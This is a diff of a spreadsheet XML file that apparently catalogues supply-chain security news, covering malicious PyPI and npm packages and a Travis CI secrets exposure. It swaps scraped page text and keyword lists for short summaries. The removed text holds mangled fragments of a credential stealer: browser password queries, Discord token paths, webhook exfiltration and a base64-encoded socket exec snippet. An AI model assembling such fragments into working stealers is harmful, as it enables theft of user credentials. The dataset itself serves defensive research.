obfuscators expect “frankenstein” malware packages stitched different attack tools changed exfiltration parameters continue monitor public package repositories sanitize instances finally we’d like thank dustin ingram dicodes quickly responding removing malicious packages read python cheat sheet python repository artifactory can’t connect pypipythonorg python malware imitates signed pypi traffic novel exfiltration technique setting pypi repository minutes jfrog artifactory tags maliciouspackagedetection securityresearch vulnerability start trial share sign blog updates read agreed privacy policy subscribe popular tags cicd artifactory best practices devops xray jfrog platform cloud selfhosted start free book demo thank full name email read agree privacy policy proceed products artifactory xray curation pipelines distribution container registry connect jfrog platform start free resources blog research events integrations jfrog help center devops tools open source featured jfrog trust compare jfrog company management investor relations partners customers careers press contact brand guidelines developer community downloads community events open source foundations community forum superfrogs applications follow jfrog rights reserved discover largescale attack targets azure supply chain attack targets germanybased malware “whitesnake” targets python terms privacy policy cookies policy cookies settings accessibility notice accessibility mode success action successful started oops something went wrong please later continue information modal message continue click 请点这里</t>
+          <t>As part of an ongoing effort by the JFrog security research team to automatically identify malicious packages, we are now reporting several Python packages hosted on PyPI as malicious.</t>
         </is>
       </c>
       <c r="D172" t="inlineStr">
         <is>
           <t>https://jfrog.com/blog/malicious-pypi-packages-stealing-credit-cards-injecting-code/</t>
-        </is>
-      </c>
-      <c r="E172" t="inlineStr">
-        <is>
-          <t>['product', 'solution', 'developer', 'resource', 'partner', 'jfrog', 'partner', 'jfrog', 'partner', 'community', 'documentation', 'integration', 'application', 'case', 'cloud', 'solution', 'hybrid', 'cloud', 'adoption', 'secure', 'aiml', 'model', 'management', 'artifact', 'management', 'tool', 'consolidation', 'code', 'scanning', 'open', 'source', 'software', 'managing', 'vulnerability', 'software', 'composition', 'analysis', 'secret', 'detection', 'containerinfra', 'holistic', 'software', 'supply', 'chain', 'device', 'management', 'industry', 'financial', 'service', 'automotive', 'industry', 'healthcare', 'service', 'technology', 'software', 'gaming', 'government', 'learning', 'guide', 'jfrog', 'help', 'center', 'research', 'jfrog', 'academy', 'event', 'webinar', 'workshop', 'consulting', 'service', 'certification', 'state', 'report', 'tool', 'collateral', 'resource', 'center', 'jfrog', 'blog', 'customer', 'story', 'customer', 'zone', 'support', 'customer', 'support', 'ticket', 'community', 'retrieve', 'legal', 'myjfrog', 'cloud', 'customer', 'portal', 'status', 'service', 'status', 'event', 'subscription', 'jfrog', 'trust', 'datum', 'jfrog', 'platform', 'software', 'speed', 'software', 'supply', 'chain', 'platform', 'endtoend', 'visibility', 'control', 'automating', 'delivery', 'release', 'devsecop', 'mlop', 'team', 'single', 'source', 'truth', 'view', 'platform', 'software', 'power', 'world', 'jfrog', 'artifactory', 'universal', 'artifact', 'model', 'repository', 'manager', 'jfrog', 'pipeline', 'enterprise', 'grade', 'cicd', 'workflow', 'automation', 'jfrog', 'distribution', 'secure', 'distribution', 'consumption', 'point', 'devsecop', 'software', 'supply', 'chain', 'jfrog', 'curation', 'software', 'package', 'model', 'jfrog', 'essential', 'xray', 'software', 'artifact', 'model', 'advanced', 'software', 'supply', 'chain', 'exposure', 'realworld', 'impact', 'analysis', 'device', 'management', 'jfrog', 'device', 'management', 'agility', 'contact', 'free', 'product', 'jfrog', 'platform', 'software', 'speed', 'software', 'supply', 'chain', 'platform', 'endtoend', 'visibility', 'control', 'automating', 'delivery', 'release', 'devsecop', 'mlop', 'team', 'single', 'source', 'truth', 'view', 'platform', 'software', 'power', 'world', 'jfrog', 'artifactory', 'universal', 'artifact', 'model', 'repository', 'manager', 'jfrog', 'pipeline', 'enterprise', 'grade', 'cicd', 'workflow', 'automation', 'jfrog', 'distribution', 'secure', 'distribution', 'consumption', 'point', 'devsecop', 'software', 'supply', 'chain', 'jfrog', 'curation', 'software', 'package', 'model', 'jfrog', 'essential', 'xray', 'software', 'artifact', 'model', 'advanced', 'software', 'supply', 'chain', 'exposure', 'realworld', 'impact', 'analysis', 'device', 'management', 'jfrog', 'device', 'management', 'agility', 'solution', 'case', 'cloud', 'solution', 'hybrid', 'cloud', 'adoption', 'secure', 'aiml', 'model', 'management', 'artifact', 'management', 'tool', 'consolidation', 'code', 'scanning', 'open', 'source', 'software', 'managing', 'vulnerability', 'software', 'composition', 'analysis', 'secret', 'detection', 'containerinfra', 'holistic', 'software', 'supply', 'chain', 'device', 'management', 'industry', 'financial', 'service', 'automotive', 'industry', 'healthcare', 'service', 'technology', 'software', 'gaming', 'government', 'pricing', 'developer', 'community', 'documentation', 'integration', 'application', 'resource', 'learning', 'guide', 'jfrog', 'center', 'research', 'jfrog', 'academy', 'event', 'webinar', 'workshop', 'consulting', 'service', 'certification', 'state', 'report', 'tool', 'collateral', 'resource', 'center', 'jfrog', 'blog', 'customer', 'story', 'customer', 'zone', 'support', 'customer', 'support', 'ticket', 'community', 'retrieve', 'legal', 'myjfrog', 'cloud', 'customer', 'portal', 'status', 'service', 'status', 'event', 'subscription', 'jfrog', 'trust', 'datum', 'partner', 'jfrog', 'partner', 'jfrog', 'partner', 'help', 'home', 'jfrog', 'malicious', 'pypi', 'package', 'credit', 'card', 'share', 'software', 'package', 'repository', 'popular', 'target', 'supply', 'chain', 'attack', 'news', 'malware', 'popular', 'repository', 'developer', 'repository', 'package', 'source', 'secure', 'malware', 'package', 'package', 'repository', 'malicious', 'actor', 'opportunity', 'repository', 'virus', 'successful', 'attack', 'developer', 'ongoing', 'effort', 'jfrog', 'research', 'team', 'malicious', 'package', 'several', 'python', 'package', 'malicious', 'package', 'datum', 'malicious', 'package', 'time', 'actual', 'impact', 'malicious', 'package', 'blog', 'post', 'share', 'technical', 'analysis', 'package', 'impact', 'package', 'package', 'name', 'maintainer', 'payload', 'credit', 'card', 'pyarmor', 'noblesse2', 'noblesse', 'noblessev2', 'code', 'injection', 'leonora123', 'technical', 'analysis', 'obfuscation', 'technique', 'package', 'novice', 'python', 'malware', 'simple', 'obfuscation', 'technique', 'python', 'text', 'simple', 'encoder', 'base64', 'text', 'code', 'example', 'code', 'import', 'base64', 'codec', 'magic', 'destiny', 'yxikavdaaqk3xjpqwkqraboucbizqjem', 'trust', 'evalx6dx61x67x69x63', 'datum', 'brevity', 'obfuscation', 'trick', 'simple', 'static', 'analysis', 'tool', 'thorough', 'analysis', 'flag', 'many', 'researcher', 'close', 'look', 'code', 'specific', 'nordic', 'metal', 'string', 'code', 'malware', 'public', 'tool', 'pythonobfuscator', 'package', 'aryi', 'pyarmor', 'malware', 'developer', 'different', 'obfuscation', 'method', 'discord', 'auth', 'token', 'payload', 'noblesse', 'family', 'malware', 'discord', 'authentication', 'token', 'authentication', 'attacker', 'impersonate', 'user', 'token', 'similar', 'http', 'session', 'cookie', 'payload', 'token', 'generator', 'tool', 'payload', 'individualized', 'token', 'grabber', 'example', 'auth', 'code', 'simple', 'path', 'local', 'osgetenvlocalappdata', 'osgetenvappdata', 'path', 'discord', 'discord', 'discord', 'canary', 'discordcanary', 'discord', 'local', 'googlechromeuser', 'datadefault', 'opera', 'opera', 'softwareopera', 'stable', 'brave', 'local', 'local', 'datadefault', 'file', 'path', 'local', 'sotrageleveldb', 'discord', 'authentication', 'token', 'char', 'mfazmdglwt6fvzvijc5xo25lupyvtrwqprylquvojn0kizz5uzwq1fbhyiatnj0sq3j4clsb7xibgzpauhec3mo', 'multifactor', 'char', 'discord', 'webhook', 'message', 'datum', 'update', 'text', 'channel', 'private', 'server', 'parameter', 'type', 'name', 'captain', 'hook', 'avatar', 'autocomplete', 'sensitive', 'datum', 'credit', 'card', 'password', 'second', 'payload', 'family', 'autocomplete', 'information', 'modern', 'browser', 'support', 'password', 'credit', 'card', 'information', 'user', 'convenient', 'downside', 'information', 'malicious', 'software', 'access', 'local', 'machine', 'case', 'credit', 'card', 'information', 'chrome', 'masterkey', 'data', 'shutilcopy2logindb', 'conncursor', 'cursorexecuteselect', 'password', 'credit', 'card', 'information', 'edge', 'brevity', 'osenvironuserprofile', 'ossep', 'datum', 'cursorexecuteselect', 'usernamevalue', 'passwordvalue', 'username', 'username', 'webhook', 'noblesse', 'payload', 'system', 'information', 'third', 'payload', 'noblesse', 'family', 'information', 'victim', 'system', 'webhook', 'address', 'computer', 'name', 'user', 'name', 'license', 'information', 'wmic', 'path', 'softwarelicensingservice', 'window', 'wmic', 'caption', 'screenshot', 'image', 'pillow', 'imagegrab', 'injection', 'much', 'simple', 'interesting', 'pretense', 'easy', 'entirety', 'package', 'code', 'import', 'execbase64b64decodeaw1wb3j0ihnvy2tldcxzdhj1y3qs', 'return', 'roundy2', 'code', 'snippet', 'import', 'socketstructtime', 'ssocketsocket2socketsocketsocketsockstream', 'lstructunpackisrecv40', 'print', 'print', 'private', 'address', 'port', 'python', 'code', 'socket', 'tip', 'developer', 'dependency', 'noblesse', 'clone', 'password', 'edge', 'password', 'respective', 'website', 'website', 'password', 'check', 'opening', 'edge', 'full', 'list', 'password', 'password', 'credit', 'card', 'chrome', 'credit', 'check', 'chrome', 'chromesettingspayment', 'full', 'list', 'credit', 'card', 'payment', 'method', 'clone', 'machine', 'malware', 'usual', 'malware', 'step', 'full', 'scan', 'software', 'summary', 'previous', 'pypi', 'research', 'lack', 'moderation', 'public', 'software', 'repository', 'inexperienced', 'attacker', 'platform', 'malware', 'dependency', 'confusion', 'simple', 'social', 'engineering', 'attack', 'code', 'snippet', 'research', 'public', 'tool', 'parameter', 'obfuscation', 'public', 'obfuscator', 'frankenstein', 'malware', 'package', 'different', 'attack', 'tool', 'exfiltration', 'parameter', 'public', 'package', 'repository', 'instance', 'dicode', 'malicious', 'package', 'python', 'cheat', 'sheet', 'python', 'repository', 'pypipythonorg', 'python', 'malware', 'traffic', 'novel', 'exfiltration', 'technique', 'pypi', 'repository', 'minute', 'jfrog', 'artifactory', 'tag', 'securityresearch', 'vulnerability', 'trial', 'share', 'sign', 'blog', 'update', 'privacy', 'policy', 'popular', 'tag', 'cicd', 'good', 'practice', 'xray', 'jfrog', 'platform', 'start', 'free', 'book', 'demo', 'full', 'name', 'email', 'privacy', 'policy', 'product', 'artifactory', 'xray', 'pipeline', 'distribution', 'container', 'registry', 'jfrog', 'platform', 'free', 'resource', 'blog', 'research', 'event', 'integration', 'jfrog', 'center', 'tool', 'open', 'source', 'jfrog', 'trust', 'jfrog', 'company', 'management', 'investor', 'relation', 'partner', 'customer', 'career', 'press', 'contact', 'brand', 'guideline', 'developer', 'community', 'community', 'event', 'open', 'source', 'foundation', 'application', 'jfrog', 'right', 'largescale', 'attack', 'target', 'azure', 'supply', 'chain', 'attack', 'target', 'germanybased', 'malware', 'whitesnake', 'python', 'term', 'privacy', 'policy', 'cookie', 'policy', 'cookie', 'setting', 'accessibility', 'notice', 'accessibility', 'mode', 'success', 'action', 'successful', 'oop', 'wrong', 'information', 'modal', 'message', '请点这里']</t>
         </is>
       </c>
     </row>
@@ -4939,17 +4249,12 @@
       </c>
       <c r="C173" t="inlineStr">
         <is>
-          <t>skip content toggle navigation sign product actions automate workflow packages host manage packages find vulnerabilities codespaces instant environments copilot write better code code review manage code changes issues plan track work discussions collaborate outside code explore features documentation github skills blog solutions enterprise teams startups education solution cicd automation devops devsecops resources learning pathways white papers ebooks webinars customer stories partners open source github sponsors fund open source developers readme project github community articles repositories topics trending collections pricing search jump search code repositories users issues pull requests search clear search syntax tips provide feedback read every piece feedback take input seriously include email address contacted cancel submit feedback saved searches saved searches filter results quickly name query available qualifiers documentation cancel create saved search sign sign signed another window reload refresh session signed another window reload refresh session switched accounts another window reload refresh session dismiss alert pypi warehouse public notifications fork star code issues pull requests actions projects insights additional navigation options code issues pull requests actions projects insights issue question project sign free github account open issue contact maintainers community pick username email address password sign github clicking “sign github” agree terms service privacy statement we’ll occasionally send account related emails already github sign account jump bottom malware package pypi closed hx601939710 opened issue comment closed malware package pypi hx601939710 opened issue comment comments copy link hx601939710 commented following packages malware steal users information including system version user info hosts info info please consider removing httpspypiorgprojectinfraframework httpspypiorgprojectonlylearn packages uploaded paras steal information including user name home directory running directory encode info form base64 visit send back information httpspypiorguserparas19860 project httpspypiorgprojectfacebookoauth2 text updated successfully errors encountered joerick reacted thumbs emoji reactions reaction copy link member commented thanks removed future please follow policy httpspypiorgsecurity reactions sorry something went wrong closed completed sign free join conversation github already account sign comment assignees assigned labels none projects none milestone milestone development branches pull requests participants footer github footer navigation terms privacy status docs contact manage cookies share personal information can’t perform action time</t>
+          <t>18 malicious packages that steal user information reported to PyPi in a Github Issue</t>
         </is>
       </c>
       <c r="D173" t="inlineStr">
         <is>
           <t>https://github.com/pypi/warehouse/issues/10032</t>
-        </is>
-      </c>
-      <c r="E173" t="inlineStr">
-        <is>
-          <t>['toggle', 'navigation', 'sign', 'product', 'action', 'workflow', 'package', 'host', 'manage', 'package', 'vulnerability', 'codespace', 'instant', 'environment', 'copilot', 'well', 'code', 'code', 'review', 'code', 'change', 'issue', 'track', 'work', 'discussion', 'code', 'documentation', 'skill', 'blog', 'solution', 'enterprise', 'team', 'startup', 'education', 'solution', 'cicd', 'automation', 'devsecop', 'resource', 'pathway', 'white', 'paper', 'ebook', 'customer', 'story', 'partner', 'source', 'sponsor', 'open', 'source', 'developer', 'project', 'community', 'article', 'repository', 'topic', 'collection', 'pricing', 'search', 'jump', 'search', 'code', 'repository', 'user', 'issue', 'request', 'clear', 'search', 'syntax', 'tip', 'feedback', 'piece', 'feedback', 'input', 'email', 'address', 'submit', 'feedback', 'search', 'search', 'filter', 'result', 'query', 'available', 'qualifier', 'documentation', 'search', 'sign', 'sign', 'window', 'reload', 'refresh', 'session', 'window', 'reload', 'refresh', 'session', 'account', 'window', 'reload', 'refresh', 'session', 'alert', 'pypi', 'warehouse', 'public', 'notification', 'star', 'issue', 'request', 'action', 'insight', 'additional', 'navigation', 'option', 'code', 'issue', 'request', 'action', 'insight', 'issue', 'question', 'project', 'sign', 'free', 'open', 'issue', 'contact', 'community', 'username', 'email', 'address', 'password', 'sign', 'sign', 'term', 'service', 'privacy', 'statement', 'account', 'email', 'account', 'jump', 'bottom', 'malware', 'package', 'issue', 'comment', 'malware', 'package', 'issue', 'comment', 'comment', 'link', 'package', 'user', 'information', 'system', 'version', 'user', 'info', 'host', 'info', 'info', 'package', 'para', 'information', 'user', 'name', 'home', 'directory', 'directory', 'encode', 'info', 'form', 'base64', 'visit', 'information', 'project', 'httpspypiorgprojectfacebookoauth2', 'text', 'error', 'thumb', 'reaction', 'reaction', 'copy', 'link', 'member', 'thank', 'future', 'policy', 'httpspypiorgsecurity', 'reaction', 'sign', 'free', 'join', 'conversation', 'sign', 'comment', 'label', 'none', 'none', 'milestone', 'development', 'branch', 'request', 'participant', 'term', 'privacy', 'status', 'doc', 'contact', 'cookie', 'personal', 'information', 'action', 'time']</t>
         </is>
       </c>
     </row>
@@ -4966,17 +4271,12 @@
       </c>
       <c r="C174" t="inlineStr">
         <is>
-          <t>skip main content tech science policy cars gaming culture store forums subscribe close navigate store subscribe videos features reviews feeds mobile site staff directory contact advertise reprints filter topic tech science policy cars gaming culture store forums settings front page layout grid list site theme light dark sign rotate secrets travis flaw exposed secrets thousands open source projects developers furious travis insanely embarrassing bulletin sharma enlarge getty images reader comments flaw travis potentially exposed secrets thousands open source projects rely hosted continuous integration service travis softwaretesting solution used open source projects users vulnerability tool made possible secure environment variables—signing keys access credentials tokens public open source projects—to exfiltrated worse community upset poor handling vulnerability disclosure process brief bulletin force travis environment variables injected pull request builds travis popular softwaretesting tool seamless integration github bitbucket makers tool explain build travis clones github repository brandnew virtual environment carries series tasks build test code tasks fail build considered broken none tasks fail build considered passed travis deploy code server application host month researcher felix lange found vulnerability caused travis include secure environment variables public open source repositories travis pull request builds environment variables include sensitive secrets like signing keys access credentials tokens variables exposed attackers abuse secrets obtain lateral movement networks thousands organizations simple github search demonstrates travis widespread large number projects enlarge github search results travisyml tracked cve202141077 present travis activation process impacts certain builds created september september part activation process developers supposed travisyml file open source project repository file tells travis contain encrypted secrets another place encrypted secrets defined travis secrets meant exposed fact travis docs always stated encrypted environment variables available pull requests forks risk exposing information unknown code advertisement ideally travis expected manner prevents public access secret environment variables specified secure environment variables configured travis remain travis sole possession péter szilágyi ethereum cryptocurrency project lead told variables added environment builds running trusted code code merged external code vars inserted since maintainer control code outsiders submit problem messed something ended injecting secret keys untrusted builds vulnerability caused sorts secrets unexpectedly exposed anyone forking public repository printing files build process fortunately issue didnt last long—around eight days thanks lange researchers notified company september caution projects relying travis advised rotate secrets exactly similar nature vulnerability echoes codecov supply chain attack actors exfiltrated secrets sensitive environment variables many codecov customers cicd environments leading data leaks prominent companies according received report public repository forked another could file pull request standard functionality github bitbucket assembla obtain unauthorized access secrets original public repository condition printing files build process explained montana mendy travis bulletin scenario secrets still encrypted travis database mendy says issue applies public repositories private repositories repository owners latter full control fork repositories community furious flimsy “security bulletin” presence relatively quick patching flaw aside travis concise bulletin overall handling coordinated disclosure process infuriated developer community advertisement long twitter thread péter szilágyi details arduous process group endured waited travis take action release brief bulletin obscure webpage sept sept secure vars public travisci repositories injected builds signing keys access creds tokens anyone could exfiltrate gain lateral movement 1000s orgs httpstcoi23jfzajjh péter szilágyi karalabeeth peterszilagyi september days pressure multiple projects travis silently patched issue 10th analysis report post mortem warning users secrets might stolen tweeted szilágyi szilágyi lange asked github travis poor posture vulnerability disclosure processes advisory showed finally multiple ultimatums multiple projects posted lameass post hidden deep nobody read even single thank acknowledgment responsible disclosure even admitting gravity said szilágyi referring bulletin—and especially abridged version included barely details enlarge thats legit bulletin szilágyi joined several members community criticizing bulletin bostonbased developer jake jarvis called disclosure insanely embarrassing bulletin travis thinks rotating secrets something developers anyway travis implemented series patches starting sept resolves issue concluded mendy behalf travis team reminder cycling secrets something users regular basis unsure please contact support reached travis szilágyi comment awaiting responses update pt—added response szilágyi received press time clarified secrets exposed travisyml file implied advisory rather travis interface reader comments sharma sharma researcher engineer reporter advertisement channel technica previous story next story related stories today store subscribe feeds view mobile site contact staff advertise reprints newsletter signup join orbital transmission mailing list weekly updates delivered inbox sign cnmn collection wired media group condé nast rights reserved andor registration portion site constitutes acceptance user agreement updated privacy policy cookie statement updated technica addendum effective earn compensation sales links site read affiliate link policy california privacy rights sell personal information material site reproduced distributed transmitted cached otherwise used except prior written permission condé nast choices</t>
+          <t>A vulnerability in the tool made it possible for secure environment variables - signing keys, access credentials, and API tokens of all public open source projects - to be exfiltrated.</t>
         </is>
       </c>
       <c r="D174" t="inlineStr">
         <is>
           <t>https://arstechnica.com/information-technology/2021/09/travis-ci-flaw-exposed-secrets-for-thousands-of-open-source-projects/</t>
-        </is>
-      </c>
-      <c r="E174" t="inlineStr">
-        <is>
-          <t>['main', 'content', 'tech', 'science', 'policy', 'car', 'gaming', 'culture', 'store', 'forum', 'close', 'navigate', 'store', 'subscribe', 'video', 'review', 'mobile', 'site', 'staff', 'directory', 'contact', 'reprint', 'filter', 'topic', 'tech', 'science', 'policy', 'car', 'gaming', 'culture', 'store', 'forum', 'front', 'page', 'layout', 'grid', 'list', 'site', 'theme', 'light', 'dark', 'sign', 'secret', 'secret', 'thousand', 'open', 'source', 'developer', 'furious', 'bulletin', 'sharma', 'getty', 'image', 'reader', 'comment', 'flaw', 'secret', 'thousand', 'open', 'source', 'project', 'continuous', 'integration', 'service', 'solution', 'open', 'source', 'user', 'vulnerability', 'tool', 'possible', 'secure', 'environment', 'variable', 'key', 'access', 'credential', 'token', 'public', 'open', 'source', 'project', 'bad', 'community', 'poor', 'handling', 'vulnerability', 'disclosure', 'process', 'brief', 'bulletin', 'force', 'variable', 'pull', 'request', 'popular', 'tool', 'seamless', 'integration', 'maker', 'tool', 'virtual', 'environment', 'series', 'task', 'test', 'code', 'task', 'broken', 'none', 'task', 'server', 'application', 'host', 'month', 'researcher', 'lange', 'vulnerability', 'secure', 'environment', 'public', 'open', 'source', 'repository', 'request', 'environment', 'variable', 'sensitive', 'secret', 'key', 'access', 'credential', 'token', 'variable', 'attacker', 'abuse', 'secret', 'lateral', 'movement', 'thousand', 'organization', 'simple', 'widespread', 'large', 'number', 'project', 'search', 'result', 'activation', 'process', 'certain', 'build', 'part', 'activation', 'process', 'developer', 'travisyml', 'file', 'open', 'source', 'project', 'repository', 'file', 'secret', 'place', 'secret', 'secret', 'fact', 'encrypted', 'environment', 'variable', 'available', 'request', 'fork', 'risk', 'information', 'unknown', 'code', 'advertisement', 'manner', 'public', 'access', 'secret', 'environment', 'variable', 'secure', 'environment', 'variable', 'péter', 'cryptocurrency', 'project', 'lead', 'variable', 'environment', 'code', 'code', 'external', 'code', 'var', 'outsider', 'problem', 'secret', 'key', 'untrusted', 'vulnerability', 'sort', 'secret', 'public', 'repository', 'printing', 'file', 'process', 'issue', 'long', 'day', 'thank', 'lange', 'researcher', 'company', 'caution', 'project', 'rotate', 'secret', 'similar', 'nature', 'vulnerability', 'supply', 'chain', 'attack', 'actor', 'secret', 'sensitive', 'environment', 'variable', 'many', 'customer', 'environment', 'datum', 'leak', 'prominent', 'company', 'report', 'public', 'repository', 'request', 'standard', 'functionality', 'assembla', 'unauthorized', 'access', 'secret', 'original', 'public', 'repository', 'condition', 'file', 'build', 'process', 'secret', 'issue', 'public', 'repository', 'private', 'repository', 'repository', 'owner', 'latter', 'full', 'control', 'fork', 'repository', 'community', 'furious', 'flimsy', 'security', 'bulletin', 'presence', 'quick', 'patching', 'flaw', 'disclosure', 'process', 'developer', 'community', 'advertisement', 'long', 'twitter', 'thread', 'péter', 'szilágyi', 'detail', 'arduous', 'process', 'group', 'action', 'release', 'brief', 'bulletin', 'obscure', 'webpage', 'var', 'public', 'travisci', 'repository', 'key', 'access', 'cred', 'token', 'lateral', 'movement', 'org', 'péter', 'day', 'pressure', 'multiple', 'project', 'issue', '10th', 'analysis', 'report', 'mortem', 'user', 'secret', 'poor', 'posture', 'vulnerability', 'disclosure', 'process', 'advisory', 'multiple', 'ultimatum', 'multiple', 'project', 'post', 'single', 'thank', 'responsible', 'disclosure', 'gravity', 'szilágyi', 'bulletin', 'version', 'detail', 'legit', 'bulletin', 'several', 'member', 'community', 'bulletin', 'developer', 'disclosure', 'embarrassing', 'bulletin', 'secret', 'developer', 'series', 'patch', 'resolve', 'issue', 'cycling', 'secret', 'user', 'regular', 'basis', 'unsure', 'contact', 'support', 'comment', 'response', 'response', 'press', 'time', 'secret', 'travisyml', 'file', 'advisory', 'engineer', 'reporter', 'advertisement', 'channel', 'technica', 'previous', 'story', 'next', 'story', 'story', 'today', 'store', 'subscribe', 'view', 'mobile', 'site', 'contact', 'staff', 'reprint', 'newsletter', 'signup', 'orbital', 'transmission', 'mailing', 'list', 'weekly', 'update', 'inbox', 'sign', 'cnmn', 'collection', 'medium', 'group', 'reserved', 'andor', 'registration', 'portion', 'site', 'acceptance', 'user', 'agreement', 'privacy', 'policy', 'cookie', 'statement', 'technica', 'effective', 'compensation', 'sale', 'link', 'site', 'affiliate', 'link', 'right', 'personal', 'information', 'material', 'site', 'cached', 'permission', 'choice']</t>
         </is>
       </c>
     </row>
@@ -4991,15 +4291,14 @@
           <t>PyPI</t>
         </is>
       </c>
-      <c r="C175" t="inlineStr"/>
+      <c r="C175" t="inlineStr">
+        <is>
+          <t>The PyPI repository has removed a Python package called 'mitmproxy2' that was an identical copy of the official 'mitmproxy' library, but with an artificially introduced code execution vulnerability.</t>
+        </is>
+      </c>
       <c r="D175" t="inlineStr">
         <is>
           <t>https://www.bleepingcomputer.com/news/security/pypi-removes-mitmproxy2-over-code-execution-concerns/</t>
-        </is>
-      </c>
-      <c r="E175" t="inlineStr">
-        <is>
-          <t>[]</t>
         </is>
       </c>
     </row>
@@ -5016,17 +4315,12 @@
       </c>
       <c r="C176" t="inlineStr">
         <is>
-          <t>skip navigation back platform platform overview automate software supply chain sonatype repository firewall block malicious open source door sonatype nexus repository build fast centralized components sonatype lifecycle control open source risk across sdlc sonatype sbom manager simplify sbom compliance monitoring integrations work tools languages packages already solutions integrated innovation align teams fuel secure deployment developers deliver quality code fast application manage vulnerability risks legal compliance enforce policy scale industry government financial services manufacturing technology healthcare pricing resources resources featured devops downloads webinar series featured state software supply chain blog webinars whitepapers ebooks launchpad customer stories free tools sonatype repository sonatype vulnerability scanner sonatype index customer resources training workshops documentation support partners become partner join extensive sonatype partner network find partner find connect certified sonatype partner company explore software supply chain management story careers innovate us—explore opportunities sonatype events attend inperson virtual learning events newsroom keep date sonatype news contact let’s talk software supply chain book demo book demo book demo newly found malware mines cryptocurrency windows linux macos devices october sharma minute read time share sonatypes automated malware detection system caught multiple malicious packages registry month packages disguise legitimate javascript libraries caught launching cryptominers windows macos linux machines malicious packages okhsa klow klown klow klown tracked sonatype20211472 whereas okhsa cataloged sonatype20211473 different versions okhsa package largely contain skeleton code launches calculator windows machines preinstallation additionally versions contain either klow klown package dependency malicious manifest file packagejson okhsa shows klown listed dependency packages published author whose account since deactivated sonatype research team discovered klown emerged within hours klow removed klown falsely touts legitimate javascript library uaparserjs help developers extract hardware specifics browser engine useragent http header sonatype researcher elshakankiry analyzed packages explains packages klow klown contain cryptocurrency miner packages detect current operating system preinstall stage proceed script depending user running windows unixbased operating system scripts download externallyhosted linux execute binary arguments specifying mining pool wallet mine cryptocurrency number threads utilize batch scripts found klown package shown script downloads jsextensionexe russiabased host known cryptominer previously flagged virustotal linux macos installations identical bash script downloads jsextension binary host shown screenshot test crypto mining generated anyrun note malicious runs quietly background infected machine purposes demonstration showing process would appear wasnt hidden isnt clear author packages aims target developers obvious signs observed indicate case typosquatting dependency hijacking klown impersonate legitimate uaparserjs library surface making attack seem like weak brandjacking attempt sonatype research team reported malicious packages october hours release packages taken team evolving open source supplychain attacks warrant advanced protection particular discovery indication developers target adversaries software write sonatype tracing novel brandjacking typosquatting cryptomining malware lurking software repositories weve also found critical vulnerabilities nextgen supplychain attacks well copycat packages targeting wellknown tech companies good news past weeks automated malware detection system caught thousands suspicious packages components either confirmed malicious previously known malicious dependency confusion copycats expanding malware detection capabilities sonatype intelligence ecosystems well pypi takes diligence luck takes expertise experienced professionals hundreds terabytes data order keep pace malware mutations sonatype analyses every newly released package keep developers safe help remain proactive safeguard software supply chains upandcoming attacks aimlpowered automated malware detection system part sonatype repository firewall powered sonatype intelligence data research team work together fullspectrum protection sonatype determines likely malicious component based historical supply chain attacks fivedozen signals insight enables flagging potential attacks researchers discover soon system flags package dependency suspicious undergoes quarantine queue manual review sonatype research team users sonatype repository firewall protected suspicious packages review underway existing components quarantined pulled downstream developer’s open source build environment moreover users enabled dependency confusion policy feature proactive protection dependency confusion attacks works whether conflicting package names exist public repository private internal repos sonatypes worldclass research data combined automated malware detection technology safeguards developers customers software supply chain infectionsst content here… update following disclosure malicious packages legitimate library uaparserjs used millions found compromised released subsequent blog post covering uaparserjs compromise tags vulnerabilities featured nexus intelligence insights written sharma researcher sonatype engineer holds passion perpetual learning works expert analyses frequently featured leading media outlets expertise lies vulnerability research reverse engineering software development spare time loves exploiting vulnerabilities ethically educating wide range audiences learn author posts topic posts open source mlai models attackers next target sharma packages spread bladeroid cryptostealer hijack instagram sharma curious case csrfmagic case study supply chain poisoning sharma overload unveiling hidden crisis vulnerability management vulnerabilities packages spread bladeroid cryptostealer hijack instagram vulnerabilities exploited ivanti connect ssrf vulnerability traced back xmltooling library vulnerabilities secure software supply chain explore platform started platform overview firewall repository lifecycle sbom manager integrations pricing products container auditor advanced legal pack lifecycle foundation solutions role integrated innovation developers application legal compliance industry government financial services manufacturing technology healthcare community free tools nexus repository sonatype vulnerability scanner sonatype index resources launchpad log4j updates blog whitepapers ebooks webinars customer stories partners find partner become partner amazon services openshift customer portal training workshops documentation sonatype customer support company careers newsroom investors contact press trust center subscribe latest software news events terms service privacy policy modern slavery statement event terms conditions sell personal information copyright 2008present sonatype rights reserved includes thirdparty code listed sonatype sonatype nexus trademarks sonatype apache maven maven trademarks apache software foundation m2eclipse trademark eclipse foundation trademarks property respective owners</t>
+          <t>Sonatypes automated malware detection system has caught multiple malicious packages on the npm registry this month. These packages disguise themselves as legitimate JavaScript libraries but were caught launching cryptominers on Windows, macOS, and Linux machines.</t>
         </is>
       </c>
       <c r="D176" t="inlineStr">
         <is>
           <t>https://blog.sonatype.com/newly-found-npm-malware-mines-cryptocurrency-on-windows-linux-macos-devices</t>
-        </is>
-      </c>
-      <c r="E176" t="inlineStr">
-        <is>
-          <t>['navigation', 'back', 'platform', 'platform', 'overview', 'automate', 'software', 'supply', 'chain', 'sonatype', 'repository', 'firewall', 'block', 'malicious', 'open', 'source', 'door', 'sonatype', 'repository', 'fast', 'component', 'lifecycle', 'control', 'open', 'source', 'risk', 'manager', 'compliance', 'monitoring', 'work', 'tool', 'language', 'package', 'solution', 'innovation', 'align', 'team', 'secure', 'deployment', 'developer', 'quality', 'code', 'fast', 'application', 'vulnerability', 'risk', 'legal', 'compliance', 'enforce', 'policy', 'scale', 'industry', 'government', 'financial', 'service', 'manufacturing', 'technology', 'healthcare', 'pricing', 'resource', 'resource', 'download', 'webinar', 'series', 'state', 'software', 'supply', 'chain', 'blog', 'webinar', 'whitepaper', 'launchpad', 'customer', 'story', 'free', 'tool', 'repository', 'sonatype', 'vulnerability', 'scanner', 'sonatype', 'index', 'customer', 'resource', 'training', 'workshop', 'documentation', 'support', 'partner', 'partner', 'extensive', 'sonatype', 'partner', 'network', 'partner', 'connect', 'sonatype', 'partner', 'company', 'software', 'supply', 'chain', 'management', 'story', 'career', 'opportunity', 'event', 'virtual', 'learning', 'event', 'newsroom', 'date', 'sonatype', 'news', 'contact', 'talk', 'software', 'supply', 'chain', 'book', 'demo', 'book', 'demo', 'book', 'demo', 'read', 'time', 'share', 'sonatype', 'malware', 'detection', 'system', 'multiple', 'malicious', 'package', 'registry', 'month', 'package', 'legitimate', 'javascript', 'library', 'cryptominer', 'different', 'version', 'package', 'calculator', 'machine', 'preinstallation', 'version', 'package', 'dependency', 'malicious', 